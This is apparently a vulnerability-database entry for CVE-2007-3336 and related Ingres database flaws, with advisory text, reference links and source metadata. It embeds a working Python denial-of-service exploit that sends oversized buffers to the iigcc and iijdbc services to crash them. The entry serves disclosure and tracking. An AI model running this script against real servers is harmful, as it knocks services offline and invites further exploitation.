document:\nhttp://servicedesk.ingres.com/CAisd/pdmweb.ingres?OP=SHOW_DETAIL+PERSID=KD:415738+HTMPL=kt_document_view.htmpl\nReported By: NGSSoftware, and iDefense\nNGSSoftware Advisory: \nhttp://www.ngssoftware.com/research/advisories/\niDefense Advisory: \nIngres Database Multiple Heap Corruption Vulnerabilities\nhttp://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546\nCVE References:\nCVE-2007-3336, CVE-2007-3337, CVE-2007-3338, CVE-2007-3334\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3336\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3337\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3338\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3334\nOSVDB References: Pending\nhttp://osvdb.org/\n\nChangelog for this advisory:\nv1.0 - Initial Release\n\nCustomers who require additional information should contact CA\nTechnical Support at http://supportconnect.ca.com. \n\nFor technical questions or comments related to this advisory, \nplease send email to vuln AT ca DOT com. \n\nIf you discover a vulnerability in CA products, please report your\nfindings to vuln AT ca DOT com, or utilize our \"Submit a \nVulnerability\" form. \nURL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx\n\n\nRegards,\nKen Williams ; 0xE2941985\nDirector, CA Vulnerability Research\n\nCA, 1 CA Plaza, Islandia, NY 11749\n\t\nContact http://www.ca.com/us/contact/\nLegal Notice http://www.ca.com/us/legal/\nPrivacy Policy http://www.ca.com/us/privacy/\nCopyright (c) 2007 CA. All rights reserved. # Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities\n# Date: 2010-08-14\n# Author: fdisk\n# Version: 2.6\n# Tested on: Windows 2003 Server SP1 en\n# CVE: CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338\n# Notes: Fixed in the last version. \n# please let me know if you are/were able to get code execution \u003crr dot fdisk at gmail dot com\u003e\n \nimport socket\nimport sys\n \nif len(sys.argv) != 4:\n print \"Usage: ./CAAdvantageDoS.py \u003cTarget IP\u003e \u003cPort\u003e \u003cService\u003e\"\n print \"Vulnerable Services: iigcc, iijdbc\"\n sys.exit(1)\n \nhost = sys.argv[1]\nport = int(sys.argv[2])\nservice = sys.argv[3]\n \nif service == \"iigcc\":\n payload = \"\\x41\" * 2106\nelif service == \"iijdbc\":\n payload = \"\\x41\" * 1066\nelse:\n print \"Vulnerable Services: iigcc, iijdbc\"\n sys.exit(1)\n \npayload += \"\\x42\" * 4\n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((host, port))\nprint \"Sending payload\"\ns.send(payload)\ndata = s.recv(1024)\ns.close()\nprint \u0027Received\u0027, repr(data)\n \nprint service + \" crashed\"\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2007-3336"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-004027"
},
{
"db": "BID",
"id": "24585"
},
{
"db": "PACKETSTORM",
"id": "57303"
},
{
"db": "PACKETSTORM",
"id": "92818"
}
],
"trust": 2.07
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2007-3336",
"trust": 2.9
},
{
"db": "BID",
"id": "24585",
"trust": 1.9
},
{
"db": "SECUNIA",
"id": "25756",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "25775",
"trust": 1.6
},
{
"db": "VUPEN",
"id": "ADV-2007-2288",
"trust": 1.6
},
{
"db": "VUPEN",
"id": "ADV-2007-2290",
"trust": 1.6
},
{
"db": "OSVDB",
"id": "37486",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2007-004027",
"trust": 0.8
},
{
"db": "BUGTRAQ",
"id": "20070625 INGRES UNAUTHENTICATED POINTER OVERWRITE 1",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20070625 INGRES UNAUTHENTICATED POINTER OVERWRITE 2",
"trust": 0.6
},
{
"db": "XF",
"id": "34993",
"trust": 0.6
},
{
"db": "XF",
"id": "35000",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-200706-389",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "57303",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "92818",
"trust": 0.1
}
],
"sources": [
{
"db": "BID",
"id": "24585"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-004027"
},
{
"db": "PACKETSTORM",
"id": "57303"
},
{
"db": "PACKETSTORM",
"id": "92818"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-389"
},
{
"db": "NVD",
"id": "CVE-2007-3336"
}
]
},
"id": "VAR-200706-0397",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.12878788
},
"last_update_date": "2024-11-23T22:09:53.324000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Ingres Security Alert",
"trust": 0.8,
"url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-004027"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
},
{
"problemtype": "CWE-DesignError",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-004027"
},
{
"db": "NVD",
"id": "CVE-2007-3336"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778"
},
{
"trust": 2.0,
"url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
},
{
"trust": 1.9,
"url": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-2/"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/24585"
},
{
"trust": 1.6,
"url": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-1/"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/25775"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/25756"
},
{
"trust": 1.6,
"url": "http://archives.neohapsis.com/archives/bugtraq/2007-06/0302.html"
},
{
"trust": 1.0,
"url": "http://osvdb.org/37486"
},
{
"trust": 1.0,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35000"
},
{
"trust": 1.0,
"url": "http://www.vupen.com/english/advisories/2007/2290"
},
{
"trust": 1.0,
"url": "http://www.securityfocus.com/archive/1/472193/100/0/threaded"
},
{
"trust": 1.0,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34993"
},
{
"trust": 1.0,
"url": "http://www.vupen.com/english/advisories/2007/2288"
},
{
"trust": 0.9,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3336"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2007-3336"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/35000"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/34993"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/472193/100/0/threaded"
},
{
"trust": 0.6,
"url": "http://www.frsirt.com/english/advisories/2007/2290"
},
{
"trust": 0.6,
"url": "http://www.frsirt.com/english/advisories/2007/2288"
},
{
"trust": 0.4,
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546"
},
{
"trust": 0.3,
"url": "http://www.ingres.com/"
},
{
"trust": 0.3,
"url": "/archive/1/472192"
},
{
"trust": 0.3,
"url": "/archive/1/471950"
},
{
"trust": 0.3,
"url": "/archive/1/472197"
},
{
"trust": 0.3,
"url": "/archive/1/472193"
},
{
"trust": 0.3,
"url": "/archive/1/472194"
},
{
"trust": 0.3,
"url": "/archive/1/472200"
},
{
"trust": 0.3,
"url": "msg://bugtraq/649cdcb56c88aa458eff2cbf494b6204030a79ca@usilms12.ca.com"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-3336"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-3334"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-3337"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-3338"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3338"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/contact/"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3334"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3337"
},
{
"trust": 0.1,
"url": "http://servicedesk.ingres.com/caisd/pdmweb.ingres?op=show_detail+persid=kd:415738+htmpl=kt_document_view.htmpl"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35452"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35453"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/privacy/"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com."
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35450"
},
{
"trust": 0.1,
"url": "http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp"
},
{
"trust": 0.1,
"url": "http://osvdb.org/"
},
{
"trust": 0.1,
"url": "http://www.ngssoftware.com/research/advisories/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/legal/"
}
],
"sources": [
{
"db": "BID",
"id": "24585"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-004027"
},
{
"db": "PACKETSTORM",
"id": "57303"
},
{
"db": "PACKETSTORM",
"id": "92818"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-389"
},
{
"db": "NVD",
"id": "CVE-2007-3336"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "24585"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-004027"
},
{
"db": "PACKETSTORM",
"id": "57303"
},
{
"db": "PACKETSTORM",
"id": "92818"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-389"
},
{
"db": "NVD",
"id": "CVE-2007-3336"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2007-06-21T00:00:00",
"db": "BID",
"id": "24585"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-004027"
},
{
"date": "2007-06-26T21:32:27",
"db": "PACKETSTORM",
"id": "57303"
},
{
"date": "2010-08-17T01:35:50",
"db": "PACKETSTORM",
"id": "92818"
},
{
"date": "2007-06-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200706-389"
},
{
"date": "2007-06-22T18:30:00",
"db": "NVD",
"id": "CVE-2007-3336"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-03-19T08:36:00",
"db": "BID",
"id": "24585"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-004027"
},
{
"date": "2007-06-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200706-389"
},
{
"date": "2024-11-21T00:32:59.103000",
"db": "NVD",
"id": "CVE-2007-3336"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200706-389"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "CA Used in products Ingres database server Vulnerable to arbitrary code execution",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-004027"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Boundary Condition Error",
"sources": [
{
"db": "BID",
"id": "24585"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-389"
}
],
"trust": 0.9
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.
Loading…